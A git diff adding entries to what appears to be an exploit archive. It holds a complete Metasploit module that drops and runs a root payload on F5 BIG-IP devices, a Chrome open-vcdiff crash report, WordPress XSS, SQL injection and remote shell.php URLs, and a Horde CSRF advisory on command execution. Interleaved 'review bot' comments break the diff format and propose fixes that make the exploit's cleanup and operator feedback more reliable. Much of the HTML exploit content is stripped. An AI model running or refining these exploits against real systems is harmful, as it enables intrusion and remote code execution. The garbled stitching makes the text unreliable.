diff --git a/files.csv b/files.csv
index 0fb3354d3..b8d7050ea 100755
--- a/files.csv
+++ b/files.csv
@@ -35021,3 +35021,17 @@ id,file,description,date,author,platform,type,port
 38749,platforms/asp/webapps/38749.txt,"Flo CMS 'archivem' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,asp,webapps,0
 38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0
 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0
+38752,platforms/windows/local/38752.c,"Watchguard Server Center Local Privilege Escalation Vulnerability",2013-09-08,"Julien Ahrens",windows,local,0
+38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin Multiple Cross Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0
+38754,platforms/php/webapps/38754.txt,"eTransfer Lite 'file name' Parameter HTML Injection Vulnerability",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0
+38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin 'cid' Parameter SQL Injection Vulnerability",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0
+38756,platforms/php/webapps/38756.txt,"WordPress RokNewsPager Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0
+38757,platforms/php/webapps/38757.txt,"WordPress RokStories Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0
+38758,platforms/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0
+38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0
+38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0
+38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash PoC",2015-11-19,"Vivek Mahajan",windows,dos,0
+38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting Vulnerabilities.",2015-11-19,Un_N0n,windows,webapps,0
+38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0
+38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,metasploit,hardware,remote,443
+38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF Vulnerability",2015-11-19,"High-Tech Bridge SA",php,webapps,80
diff --git a/platforms/hardware/remote/38764.rb b/platforms/hardware/remote/38764.rb
new file mode 100755
index 000000000..8556b7835
--- /dev/null
+++ b/platforms/hardware/remote/38764.rb
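Review bot: The new 38762 record's title reads `Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting Vulnerabilities.` — "Sever" looks like a typo for "Server", and it is the only title in this batch that ends with a period. Suggest `"Netwin SurgeFTP Server 23d6 - Stored Cross Site Scripting Vulnerabilities"` so searches on the product name find it. The record points at platforms/windows/webapps/38762.txt, whose body is not in this view, so the product name cannot be confirmed against the advisory itself here.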
@@ -0,0 +1,283 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'nokogiri'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
+ STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+ LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => "F5 iControl iCall::Script Root Command Execution",
+ 'Description' => %q{
+ This module exploits an authenticated privilege escalation
+ vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
+ other F5 devices). This requires valid credentials and the Resource
+ Administrator role. The exploit should work on BIG-IP 11.3.0
+ - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
+ for more details)
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'tom', # Discovery, Metasploit module
+ 'Jon Hart ' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2015-3628'],
+ ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
+ ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
+ ],
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ ['F5 BIG-IP LTM 11.x', {}]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => "Sep 3 2015",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
+ OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
+ OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
+ ])
+ register_advanced_options(
+ [
+ OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]),
+ OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
+ OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
+ OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
+ ])
+ end
+
+ def setup
+ file = datastore['FILENAME']
+ file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
+ @payload_path = ::File.join(datastore['PATH'], file)
+ super
+ end
+
+ def build_xml
+ builder = Nokogiri::XML::Builder.new do |xml|
+ xml.Envelope do
+ xml = xml_add_namespaces(xml)
+ xml['soapenv'].Header
+ xml['soapenv'].Body do
+ yield xml
+ end
+ end
+ end
+ builder.to_xml
+ end
+
+ def xml_add_namespaces(xml)
+ ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
+ xml.doc.root.namespace = ns
+ xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
+ xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
+ xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
+ xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
+ xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
+ xml
+ end
+
+ def send_soap_request(pay)
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path),
+ 'method' => 'POST',
+ 'data' => pay,
+ 'username' => datastore['USERNAME'],
+ 'password' => datastore['PASSWORD']
+ )
+ if res
+ return res
+ else
+ vprint_error('No response')
+ end
+ false
+ end
+
+ def create_script(name, cmd)
+ create_xml = build_xml do |xml|
+ xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
+ xml.scripts(STRING_ATTRS) do
+ xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+ xml.item name
+ end
+ xml.definitions(STRING_ATTRS) do
+ xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+ xml.item cmd
+ end
+ end
+ end
+ send_soap_request(create_xml)
+ end
+
+ def delete_script(script_name)
+ delete_xml = build_xml do |xml|
+ xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
+ xml.scripts(STRING_ATTRS) do
+ xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+ xml.item script_name
+ end
+ end
+ end
+ print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml))
+ res
+ end
+
+ def script_exists?(script_name)
+ exists_xml = build_xml do |xml|
+ xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
+ end
+ res = send_soap_request(exists_xml)
+ res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
+ end
+
+ def create_handler(handler_name, script_name)
+ print_status("Creating trigger #{handler_name}")
+ handler_xml = build_xml do |xml|
+ xml['per'].create(SOAPENV_ENCODINGSTYLE) do
+ xml.handlers(STRING_ATTRS) do
+ xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+ xml.item handler_name
+ end
+ xml.scripts(STRING_ATTRS) do
+ xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+ xml.item script_name
+ end
+ xml.intervals(LONG_ATTRS) do
+ xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+ # we set this to run once every 24h, but because there is no
+ # start/end time it will run once, more or less immediately, and
+ # again 24h from now, but by that point hopefully we will have
+ # cleaned up and the handler/script/etc are gone
+ xml.item 60 * 60 * 24
+ end
+ end
+ end
+ res = send_soap_request(handler_xml)
+ if res
+ if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
+ true
+ else
+ print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
+ false
+ end
+ else
+ print_error("No response to trigger creation")
+ false
+ end
+ end
+
+ def delete_handler(handler_name)
+ delete_xml = build_xml do |xml|
+ xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
+ xml.handlers(STRING_ATTRS) do
+ xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+ xml.item handler_name
+ end
+ end
+ end
+
+ print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml))
+ res
+ end
+
+ def handler_exists?(handler_name)
+ handler_xml = build_xml do |xml|
+ xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
+ end
+ res = send_soap_request(handler_xml)
+ res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
+ end
+
+ def check
+ # strategy: we'll send a create_script request, with empty name:
+ # if everything is ok, the server return a 500 error saying it doesn't like empty names
+ # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
+ # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
+ # any other response is considered not vulnerable
+ res = create_script('', '')
+ if res && res.code == 500 && res.body =~ /path is empty/
+ return Exploit::CheckCode::Appears
+ elsif res && res.code == 401
+ print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
+ return Exploit::CheckCode::Unknown
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ # phase 1: create iCall script to create file with payload, execute it and remove it.
+ shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
+ cmd = %(exec /bin/sh -c "#{shell_cmd}")
+
+ arg_max = datastore['ARG_MAX']
+ if shell_cmd.size > arg_max
+ print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
+ "or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
+ return false
+ end
+
+ script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
+ print_status("Uploading payload script #{script_name}")
+ unless (create_script_res = create_script(script_name, cmd))
+ print_error("No response when uploading payload script")
+ return false
+ end
+ unless create_script_res.code == 200
+ print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
+ "#{create_script_res.code} #{create_script_res.message}")
+ return false
+ end
+ unless script_exists?(script_name)
+ print_error("Payload script uploaded successfully but script was not found")
+ return false
+ end
+ register_file_for_cleanup @payload_path
+
+ # phase 2: create iCall Handler, that will actually run the previously created script
+ handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
+ unless create_handler(handler_name, script_name)
+ delete_script(script_name)
+ return false
+ end
+ unless handler_exists?(handler_name)
+ print_error("Trigger created successfully but was not found")
+ delete_script(script_name)
+ return false
+ end
+ print_status('Waiting for payload to execute...')
+
+ # if our payload has not been successfully executed just yet, wait
+ # until it does or give up
+ slept = 0
+ until session_created? || slept > datastore['SESSION_WAIT']
+ Rex.sleep(1)
+ slept += 1
+ end
+
+ print_status('Trying cleanup...')
+ delete_script(script_name)
+ delete_handler(handler_name)
+ end
+end
\ No newline at end of file
diff --git a/platforms/lin_x86/dos/38763.txt b/platforms/lin_x86/dos/38763.txt
new file mode 100755
index 000000000..7029bb4a0
--- /dev/null
+++ b/platforms/lin_x86/dos/38763.txt
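Review bot: The cleanup at the end of `exploit` calls `delete_script(script_name)` before `delete_handler(handler_name)`, i.e. it removes the script while the periodic handler still references it; if the device refuses that deletion the script survives for the 24h re-run the comment in `create_handler` worries about, so the two calls should be swapped to `delete_handler(handler_name)` then `delete_script(script_name)`. The wait loop also gives up silently after SESSION_WAIT (default 5 s) and cleans up regardless, so an operator whose payload merely took longer gets no hint; a `print_warning('No session after SESSION_WAIT seconds, cleaning up anyway') unless session_created?` before `print_status('Trying cleanup...')` would make that visible. Minor: the ARG_MAX guard measures `shell_cmd.size`, but what is stored in the iCall script is `cmd`, which wraps it in `exec /bin/sh -c "..."`, so the check is a few bytes optimistic. Whether TMOS actually rejects deleting a referenced script is inferred, not visible in the hunk.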
@@ -0,0 +1,131 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=513
+
+There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC.
+
+(/src/sdch/open-vcdiff/src/headerparser.cc)
+
+bool VCDiffHeaderParser::ParseSectionLengths(
+ bool has_checksum,
+ size_t* add_and_run_data_length,
+ size_t* instructions_and_sizes_length,
+ size_t* addresses_length,
+ VCDChecksum* checksum) {
+ ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled
+ ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled
+ ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled
+ if (has_checksum) {
+ ParseChecksum("Adler32 checksum value", checksum);
+ }
+ if (RESULT_SUCCESS != return_code_) {
+ return false;
+ }
+ if (!delta_encoding_start_) {
+ VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths "
+ "was called before ParseWindowLengths" << VCD_ENDL;
+ return_code_ = RESULT_ERROR;
+ return false;
+ }
+ const size_t delta_encoding_header_length =
+ UnparsedData() - delta_encoding_start_;
+ if (delta_encoding_length_ !=
+ (delta_encoding_header_length +
+ *add_and_run_data_length +
+ *instructions_and_sizes_length +
+ *addresses_length)) { // <---- Integer overflow here (32-bit systems only)
+ VCD_ERROR << "The length of the delta encoding does not match "
+ "the size of the header plus the sizes of the data sections"
+ << VCD_ENDL;
+ return_code_ = RESULT_ERROR;
+ return false;
+ }
+ return true;
+}
+
+These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024)
+
+size_t add_and_run_data_length = 0;
+ size_t instructions_and_sizes_length = 0;
+ size_t addresses_length = 0;
+ if (!header_parser->ParseSectionLengths(has_checksum_,
+ &add_and_run_data_length,
+ &instructions_and_sizes_length,
+ &addresses_length,
+ &expected_checksum_)) {
+ return header_parser->GetResult();
+ }
+ if (parent_->AllowInterleaved() &&
+ // snip...
+ } else {
+ // If interleaved format is not used, then the whole window contents
+ // must be available before decoding can begin. If only part of
+ // the current window is available, then report end of data
+ // and re-parse the whole header when DecodeChunk() is called again.
+ if (header_parser->UnparsedSize() < (add_and_run_data_length +
+ instructions_and_sizes_length +
+ addresses_length)) {
+ return RESULT_END_OF_DATA;
+ }
+ data_for_add_and_run_.Init(header_parser->UnparsedData(),
+ add_and_run_data_length);
+ instructions_and_sizes_.Init(data_for_add_and_run_.End(),
+ instructions_and_sizes_length);
+ addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length);
+
+This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t.
+
+It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point.
+
+It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH.
+
+VERSION
+Chrome Version: 47.0.2499.0
+Operating System: Linux x86
+
+REPRODUCTION CASE
+Please include a demonstration of the security bug, such as an attached
+HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE
+make the file as small as possible and remove any content not required to
+demonstrate the bug.
+
+FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
+Type of crash: browser
+Crash State:
+
+eax 0xf9ae8a78 -106001800
+ecx 0xe7502d43 -414175933
+edx 0x7b83e020 2072240160
+ebx 0xf76597a0 -144336992
+esp 0xe75025d0 0xe75025d0
+ebp 0xe7502798 0xe7502798
+esi 0x5 5
+edi 0xf9061200 -117042688
+eip 0xf1ddebee 0xf1ddebee
+eflags 0x210a93 [ CF AF SF IF OF RF ID ]
+cs 0x23 35
+ss 0x2b 43
+ds 0x2b 43
+es 0x2b 43
+fs 0x0 0
+gs 0x63 99
+
+=> 0xf1ddebee : movzbl (%edx),%ecx
+ 0xf1ddebf1 : mov (%edi),%esi
+ 0xf1ddebf3 : cmpb $0x0,0x100(%esi,%ecx,1)
+ 0xf1ddebfb : je 0xf1ddec06
+ 0xf1ddebfd : movsbl %cl,%edx
+
+#0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78
+#1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231
+#2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359
+#3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=, len=, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887
+#4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", , len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393
+#5 0xf1d2b17f in DecodeChunk > (this=0x7b83e020, data=, len=3880791363, output=) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83
+#6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=) at ../../net/filter/sdch_filter.cc:424
+#7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 , dest_len=0xe75033c8) at ../../net/filter/filter.cc:131
+#8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145
+#9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=) at ../../net/url_request/url_request_job.cc:673
+#10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=, buf_size=, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38763.zip
+
diff --git a/platforms/php/webapps/38753.html b/platforms/php/webapps/38753.html
new file mode 100755
index 000000000..86d1e65ea
--- /dev/null
+++ b/platforms/php/webapps/38753.html
@@ -0,0 +1,202 @@
+source: http://www.securityfocus.com/bid/62269/info
+
+The Event Easy Calendar plugin for WordPress is prone to multiple cross-site request-forgery vulnerabilities.
+
+Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
+
+Event Easy Calendar 1.0.0 is vulnerable; other versions may also be affected.
+
+
+f of Concept
+========================
+Add Customer
+
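Review bot: The write-up flags only the sum in `ParseSectionLengths` as the overflow, but the second check it quotes from vcdecoder.cc, `header_parser->UnparsedSize() < (add_and_run_data_length + instructions_and_sizes_length + addresses_length)`, adds the same three attacker-controlled `size_t` values and wraps the same way on 32-bit, after which the three `Init` calls carve buffers past the available input. A fix therefore has to bound each section length individually against the remaining data (or use overflow-checked addition) rather than only repairing the headerparser.cc comparison. This is read off the snippets quoted in the text; the surrounding vcdecoder.cc code is not in the hunk.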
+ + + + + + + + + + + +
+ +Update Customer +
+ + + + + + + + + + + + + +
+ +New Booking +
+ + + + + + + + + +
+ +Add Service +
+ + + + + + + + + + + + + + + + + + + +
+ +Add Block Out +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +Add Cupon +
+ + + + + + + + + + +
+ +Default Settings +
+ + + + + + + + + +
+ +Reminder Settings +
+ + + + + +
+ +PayPal Settings +
+ Email: + + + + + + + +
+ +Mailchimp Settings +
+ + + + + + + + +
+ +Facebook Connect +
+ + + + + + +
+ +Auto Approve +
+ + + + +
+ +Delete All Bookings +
+ + + +
+ +Restore Factory Settings +
+ + + +
+
diff --git a/platforms/php/webapps/38754.txt b/platforms/php/webapps/38754.txt
new file mode 100755
index 000000000..9b7ec1845
--- /dev/null
+++ b/platforms/php/webapps/38754.txt
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/62313/info
+
+eTransfer Lite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
+
+eTransfer Lite 1.0 is vulnerable; other versions may also be affected.
+
+The following files are hosted live from the iPad's Docs folder.

Images:

+<[PERSISTENT INJECTED SCRIPT +CODE!]">s2.png +( 51.8 Kb, 2013-08-25 02:09:25 +0000)
+a2b642e7de.jpg +( 238.0 Kb, 2013-08-25 02:08:13 +0000)
+











Powered + By

+
diff --git a/platforms/php/webapps/38755.txt b/platforms/php/webapps/38755.txt
new file mode 100755
index 000000000..e9dded6e0
--- /dev/null
+++ b/platforms/php/webapps/38755.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/62438/info
+
+mukioplayer4wp for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+mukioplayer4wp 1.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/videos/wp-content/plugins/mukioplayer-for-wordpress/php-scripts/get.php?cid=71866877%27
\ No newline at end of file
diff --git a/platforms/php/webapps/38756.txt b/platforms/php/webapps/38756.txt
new file mode 100755
index 000000000..498a93118
--- /dev/null
+++ b/platforms/php/webapps/38756.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/62458/info
+
+The RokNewsPager plugin for WordPress is prone to multiple security vulnerabilities, including:
+
+1. An information-disclosure vulnerability
+2. A cross-site scripting vulnerability
+3. An arbitrary file-upload vulnerability
+4. A denial-of-service vulnerability
+
+Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
+http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://
+http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example.com/big_file&h=1&w=1
+http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example2.com/shell.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38757.txt b/platforms/php/webapps/38757.txt
new file mode 100755
index 000000000..232cca1d0
--- /dev/null
+++ b/platforms/php/webapps/38757.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/62459/info
+
+The RokStories plugin for WordPress is prone to multiple security vulnerabilities, including:
+
+1. An arbitrary file-upload vulnerability
+2. A cross-site scripting vulnerability
+3. An information-disclosure vulnerability
+4. A denial-of-service vulnerability
+
+Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+RokStories 1.25 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
+
+http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://
+
+http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example.com/big_file&h=1&w=1
+
+http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example2.com/shell.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38765.txt b/platforms/php/webapps/38765.txt
new file mode 100755
index 000000000..733cedc52
--- /dev/null
+++ b/platforms/php/webapps/38765.txt
@@ -0,0 +1,90 @@
+Advisory ID: HTB23272
+Product: Horde Groupware
+Vendor: http://www.horde.org
+Vulnerable Version(s): 5.2.10 and probably prior
+Tested Version: 5.2.10
+Advisory Publication: September 30, 2015 [without technical details]
+Vendor Notification: September 30, 2015
+Vendor Patch: October 22, 2015
+Public Disclosure: November 18, 2015
+Vulnerability Type: Cross-Site Request Forgery [CWE-352]
+CVE Reference: CVE-2015-7984
+Risk Level: High
+CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde Groupware, used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information, stored in database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and company’s infrastructure.
+
+
+1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984
+
+1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server.
+
+CSRF exploit below sends HTTP POST request to vulnerable script and instructs it to display output of "/bin/ls" command. As a result, you will see contents of "/admin/" directory:
+
+
+
+ + +
+ + + +1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with application’s database. + +The exploit code below executes "SELECT version()" query and displays version of current MySQL server: + + +
+ + +
+ + + +1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server. + +The exploit code below executes the "phpinfo()" function and displays its output: + + +
+ + + +
+
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to Horde Groupware 5.2.11
+
+More Information:
+http://lists.horde.org/archives/announce/2015/001137.html
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware.
+[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
\ No newline at end of file
diff --git a/platforms/windows/dos/38758.py b/platforms/windows/dos/38758.py
new file mode 100755
index 000000000..e91e724ce
--- /dev/null
+++ b/platforms/windows/dos/38758.py
